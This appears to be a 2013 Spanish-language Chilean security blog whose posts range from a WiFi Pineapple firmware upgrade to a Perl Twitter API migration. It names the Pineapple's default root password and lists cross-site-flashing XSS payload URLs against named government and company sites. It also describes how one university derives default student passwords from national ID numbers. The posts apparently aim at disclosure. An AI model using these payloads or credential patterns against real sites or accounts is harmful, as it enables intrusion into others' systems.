sábado, 19 de octubre de 2013

Upgradeando la Piña WiFi MK4 y no morir en el Intento









Estos días que ando con un "poco" más de tiempo, quise upgradear el firmware de la Piña y me di cuenta que mediante la plataforma el navegador arrojaba distintos problemas.




1) Decía descargar la versión 2.8.1 y realmente descargaba la 3.0.0 por lo que el MD5 no coincidía con el que te ofrece para comparar.


2) Al intentar usar el MD5 disponible directo del sitio (MK4)
arrojaba un error "Error, please check the file you specified. Error 7"



Buscando soluciones por las webs oficiales, di con la solución al Upgrade [ Sí, bendito ssh ]:

Nos conectamos a la piña por ssh:




ssh root@172.16.42.1
Password: pineapplesareyummy


Una vez dentro primero tendremos que generar un poco de espacio, ya que sino no podremos subir el firmware por scp a la piña. Entonces ejecutamos:





mtd -r erase rootfs_data


Luego de esto subimos por scp el fichero de Upgrade que descargamos desde la pagina oficial al directorio /tmp de la piña. así:


scp upgrade-2.8.1.bin root@172.16.42.1:/tmp/


Una vez dentro nuevamente de la piña por ssh, vamos a verificar el md5 del archivo haciendo un:



md5sum /tmp/upgrade-2.8.1.bin

Si correspondiera a la correcta, en este caso a:    17e4384a79e7fef9c267f7da34ed4743  Seguimos con el siguiente comando:




sysupgrade -n /tmp/upgrade-2.8.1.bin


Ahora solo queda hacer un reboot y listo !




Ahora a seguir instalando Infusions..

G0!

sábado, 7 de septiembre de 2013

[XSF-XSS] Cross Site Flashing - Sitios Chilenos



Buscando sitios chilenos que tuvieran presente JW Player y revisando si la versión era vulnerable, o habia sido actualizada o fixeada para  Cross site Flashing | XSS , gracias a un pequeño script en perl y a Google di con unos sitios los cuales se ven afectados por esta vulnerabilidad.

Lista de sitios Chilenos Afectados:

TOP 8 || GOB y sitios conocidos
http://hacienda.gov.cl/js/jwplayer/player.swf?debug=alert%28/XSFF/%29 

http://www.adnradio.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 

http://www.24horas.cl/skins/24horas/gfx/jwplayer/jwplayer.swf?debug=alert%28%22XSFF%22%29 

http://www.despegapyme.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 

https://gondwana.cl/~gondwana/plugins/muscolplayers/jwplayer/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.gobiernosantiago.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 

http://www.iansa.cl/wp-content/themes/IANSA-2010/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 

http://www.ccu.cl/wp/wp-content/themes/CCU-2011/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.cruzverde.cl/rps_cruzverde_v60/opensite/Cruz%20Verde%20Internet/style/images/guateros-peluche/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

martes, 20 de agosto de 2013

[6ta vez] Página de la JUNJI con links de Porno



De la SAGA: Hey Junji !
Presentamos por 5ta vez : Junji tienes links de Pornografía!

Dejándose de bromas, es 5ta vez que informo de presencia de links de pornografia en el sitio de la JUNJI CHILE, es procupante que esto se este repitiendo una y otra vez debido a que las soluciones que se están ejecutando son solo temporales borrando los links y no corrigiendo el origen del problema.

Timeline:


Primera denuncia:(octubre-2012) http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html
Segunda denuncia:(diciembre 2012)  http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/
Tercera denuncia: ( Enero-2013) http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html
Cuarta denuncia: (abril-2013):  http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html 
Quinta denuncia (junio-2013): http://blog.xshinee.cl/2013/06/5ta-vez-pagina-de-la-junji-con-links-de.html 



viernes, 2 de agosto de 2013

Links Porno en Source de dellibertador .gob .cl



Como se ha repetido últimamente en algunos sitios del Gobierno, han aparecido links a sitios pornos en el source del sitio dellibertador.gob.cl, muchas veces que no se ven reflejados en el sitio en si [display:none etc ], pero que buscan secuestrar tus clicks frecuentemente.

Aqui un SS del Source:









// Reportado.

viernes, 28 de junio de 2013

[5ta vez] Página de la JUNJI con links de Porno





De la SAGA: Hey Junji !
Presentamos por 5ta vez : Junji tienes links de Pornografía!

Dejándose de bromas, es 5ta vez que informo de presencia de links de pornografia en el sitio de la JUNJI CHILE, es procupante que esto se este repitiendo una y otra vez debido a que las soluciones que se están ejecutando son solo temporales borrando los links y no corrigiendo el origen del problema.

Timeline:


Primera denuncia:(octubre-2012) http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html
Segunda denuncia:(diciembre 2012)  http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/
Tercera denuncia: ( Enero-2013) http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html
Cuarta denuncia: (abril-2013):  http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html


La imagen para esta 5ta Vez:


sábado, 22 de junio de 2013

Migrando Módulo Net::Twitter hacia API Twitter v1.1


Para quienes usamos Perl día a día para simplificar algunas tareas y automatizar un poco, es que va destinado esta entrada sobre el Modulo de Net::Twitter y su migración desde la API de Twitter v1 hacia la v1.1

Muchas veces usamos perl para programar bots que repitan mensajes aleatorios, o algo tan simple como twittear desde la linea de comando de forma rápida o hasta para monitorizar a distancia.

En fin muchos se habrán dado cuenta que sus codes asociados a la API de twitter a dejado de funcionar debido al cambio de API a la versión 1.1

Aquí dejo los pasos para migrar de forma exitosa y volver a tener rodando nuestros queridos codigos.





SYNOPSIS






use Net::Twitter
 
my $nt = Net::Twitter->new(
    traits              => [qw/API::RESTv1_1/],
    consumer_key        => $consumer_key,
    consumer_secret     => $consumer_secret,
    access_token        => $access_token,
    access_token_secret => $access_token_secret,
);


DESCRIPCION

Net :: Twitter antes de la versión 4.0 utiliza la API de Twitter de la versión 1. Ahora el API de Twitter v1.1 introdujo cambios que no son completamente compatibles hacia atrás, lo que requiere algunos cambios en el código de llamada.

Net::Twitter intenta siempre que la compatibilidad con versiones anteriores sea posible. En este documento se explica los cambios necesarios que debemos aplicar en el codigo de la nuestra aplicación para que pueda funcionar el Modulo Net::Twitter con la API de twitter version 1.1.


LO PRIMERO


Incluir API::RESTv1_1



Cada vez que creamos objeto en Net::Twitter llamando un new , debemos reemplazar  API::REST y dejarlo como API::RESTv1_1  . Para la mayoria de las aplicaciones esto es todo lo necesario.


EXCEPCIONES


La característica  Ratelimit es incompatible con el API::RESTv1_1


La caracteristica Ratelimit es incompatible con el API::RESTv1_1 . Rate limiting es uno de los cambios mas grandes en la versión 1.1.  En la v1 habia dos tipos de rate limit, uno para direcciones IP para llamadas no autenticadas y otro para usuario/aplicación para llamadas autenticadas. En la versiones 1.1 cada llamada debe estar autenticada y cada endpoint de la API ( i.e: Cada metodo ) tiene su rate limit. Los nuevos rate limits operan en una ventana de 1 hora.


Si tu codigo actualmente utiliza RateLimit tendrás que escribir código personalizado proporcionar una funcionalidad equivalente.



rate_limits_status


El valor de retorno para rate_limits_status es totalmente diferente. Consulte la documentación de la API de Twitter rate_limit_status para más detalles.









blocking
blocking_ids
friends
followers

Con API v1.1, estos métodos utilizan  cursor. Si usted no pasa un parámetro cursor, Twitter asume cursor => -1>
EL código existente que espera un valor de retorno arrayref debe ser modificado para esperar uno hashref y eliminar la referencia del slot users.

# With API v1
my $r = $nt->friends;
my @friends = @$r;
 
# With API v1.1
my $r = $nt->friends;
my @friends = @{$r->{users}};

Search

El método de búsqueda y el valor de retorno son sustancialmente diferentes entre Twitter API v1 y v1.1. En v1, búsqueda fue proporcionada por la característica API::Search . En v1.1, search se incluye en la característica API::RESTv1_1.

En primer lugar, debemos eliminar API::Search de sus llamadas a new. La caracteristica API::Search es incompatible con la API::RESTv1_1.

En v1, Twitter ha devuelto un hashref con varias teclas que contienen los metadatos. El conjunto actual de resultados se encuentra en el slot results:



# With Twitter API v1
my $nt = Net::Twitter->new(traits => [qw/API::REST API::Search/]);
 
my $r = $nt->search('perl hacker');
for my $status ( @{$r->{results} ) {
    # process each status...
}


Version 1.1 devuelve un hash con 2 slots: search_metadata and statuses



# With Twitter API v1.1
my $nt = Net::Twitter->new(traits => [qw/API::RESTv1_1/], %oauth_credentials);
 
my $r = $nt->searh('perl hacker');
for my $status ( @{$r->{statuses} ) {
    # process each status...
}


Desplazamiento por los resultados de búsqueda funciona de forma diferente en v1.1. En v1, Twitter ofrece un parámetro page:


# With Twitter API v1
for ( my $page = 1; $page <= 10; ++$page ) {
    my $r = $nt->search({ q => $query, page => $page, rpp => 100 });
    last unless @{$r->{results}};
 
    # process a page of results...
}


En la v1.1, se usa  max_id y count para obtener los resultados:



# With Twitter API v1.1
for ( my %args = ( q => $query, count => 100 ), my $n = 0; $n < 1000; ) {
    my $r = $nt->search({ %$args });
    last unless @{$r->{statuses}};
 
    $args{max_id} = $r->{statuses}[-1]{id} - 1;
    $n += @{$r->{statuses}};
 
    # process a page of results...
}


METODOS DESAPOBRADOS
algunos metodos de la API v1 de Twitter no estan disponibles para la v1.1:
friends_timeline
usar home_timeline en cambio
friendship_exists
relationship_exists
follows
friendship_exists y sus alias no están soportados en API v1.1. Debes usar show_friendship en cambio:

my $r = $nt->show_relationship({
    source_screen_name => $user_a,
    target_screen_name => $user_b,
});
if ( $r->{relationship}{source}{following} ) {
    # $user_a follows $user_b
}



//FIN

## Twitter for all 
## Fuente original

martes, 14 de mayo de 2013

Claves por Default en el 2013?




Claves por default no es algo nuevo, la verdad es una de las formas más básicas de inseguridad en todos los tiempos. Entra entrada está motivada por la presencia de estas malas prácticas aun en el 2013 y donde sus consecuencias están subestimadas.

Podemos encontrar este problemas en distintas situaciones como:

  • Modems / Routers
  • WiFi ISP
  • Passwords asociados a Jailbreak en IOS ( Alpine )
  • Cuentas personales en Intranet / colegios y Universidades.
  • Claves de acceso físico
  • y más.


Password en la Universidad .. ?

*~ Conversando por ahí me di cuenta que algo que sucedía en algunas universidades es algo totalmente común para algunos. Algo preocupante porque mientras mas común es para la gente, mas se pueden aprovechar de estás fallas por lo que habrían mas víctimas.

Al entrar a la universidad generalmente se nos asigna una cuenta generalmente del tipo : 

PrimerySegundoNombre.Apellido@Universidad.Dominio

Si el RUT es: 12.345.678-9  / claveDefault: 5678
              12.345.678-9  / claveDefault: 6789


Usos del Password..?

Los passwords en la universidad estan diseñados para:
  • ingresar al Intranet desde la web
  • acceder a tu información
  • ver horarios
  • estados de pago
  • Tomar asignaturas y sus horarios.
  • Imprimir en el Lab de Computación a tu Saldo Mensual. $$
  • Ingresar al uso de pcs en el Lab de Computación.
  • Acceso a tu cuenta de correo educacional




Malas Prácticas..?

Es curioso darse cuenta que la mayoría de los alumnos no cambian su clave por default, muchos nisiquiera imaginan las cosas que se podrían lograr accediendo. ( no extrapolan el peligro ).

Mas curioso aún, a finales de cada año ciertas universidades realizan un Reseteo de las claves, por lo que cada año comienzas con tu misma clave por default. / y en el olvido queda tu clave actualizada que hayas cambiado previamente.




Fin~#